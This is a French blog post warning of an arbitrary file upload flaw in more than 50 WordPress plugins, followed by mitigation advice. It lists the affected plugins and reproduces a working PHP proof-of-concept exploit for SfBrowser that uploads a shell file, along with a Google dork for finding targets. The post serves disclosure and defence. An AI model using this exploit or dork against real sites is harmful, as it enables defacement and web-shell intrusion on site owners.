Alerte - 50 plugins Wordpress troués !

par Korben -

Je viens de recevoir par email un avis de la société Seraum spécialisée en sécurité informatique, qui a mis au jour une faille critique permettant l’upload de fichiers dans plus de 50 plugins WordPress. Du coup, c’est important que vous soyez au courant que si vous utilisez un de ces plugins, vous pouvez vous faire défacer en 2 secondes par un script kiddie qui n’aurait pas école aujourd’hui.

Liste des plugins vulnérables

Plugins de galerie et diaporama

  • Homepage slideshow
  • 3D banner rotator
  • Poverplay gallery
  • WordPress Accordion Gallery
  • Video Gallery 1.3
  • Royal Gallery
  • RBX Gallery
  • PictureSurf Gallery
  • PICA Photo Gallery
  • Mac photo gallery
  • Bliss Gallery
  • Catpro Gallery
  • Matrix Gallery
  • Gallery Explorer
  • Dreamwork Gallery

Plugins de gestion de fichiers

  • Nmedia User File Uploader
  • Front end upload
  • File groups
  • SfBrowser
  • PDW File Browser
  • Front file manager
  • Omni secure files
  • Asset Manager

Plugins divers

  • Wp-Property
  • HTML5 Av Manager
  • wp-gpx-map
  • User Meta
  • WPStoreCart
  • MM Forms Community
  • Tinymce Remind
  • Foxypress
  • FCChat Widget
  • Comment Extra Fields

Exemple d’exploit (SfBrowser)

###########################################################
#
# Exploit Title: Wordpress SfBrowser Version 1.4.5 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/sfbrowser/connectors/php/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.sjeiti.com/
# Software Link: http://downloads.wordpress.org/plugin/sfbrowser.zip
# Version: 1.4.5
#
###########################################################

<?php
$u="C:Program Files (x86)EasyPHP-5.3.9wwwshell.ptxt";
$c = curl_init("http://127.0.0.1/wp/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$u",
'a'=>"upload",
'file'=>"",
'deny'=>"lam",
'allow'=>"ptxt|exe|sh",
'resize'=>array(0,0)));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

Solutions de protection

Pour se protéger, plusieurs possibilités à part supprimer le plugin vulnérable :

  1. Protéger les dossiers
  • Placer un fichier .htaccess dans les dossiers de plugin
  • Placer des index.php vides dans les dossiers qui n’en ont pas
  1. Sécuriser le code
  • Inclure un appel aux variables ABSPATH ou session admin au début de chaque script php

Ressources utiles

Quand les dev font de la merde, les admins trinquent ;-)

Bonne sécurisation à tous !

Merci à Adrien Thierry, l’auteur de cet exploit de m’avoir informé.

Que faire après le bac quand on est passionné de cybersécurité ?
Contenu partenaire
Logo de l'école de Cybersécurité Guardia
Tracking Matomo Guardia

Entièrement dédiée à la cybersécurité, l'école Guardia est accessible soit directement après le bac (post-bac), soit après un bac+2 ou bac+3. En rejoignant l'école Guardia, vous deviendrez développeur informatique option cybersécurité (Bac+3) ou expert en cybersécurité (Bac+5).

Cliquez ici pour en savoir plus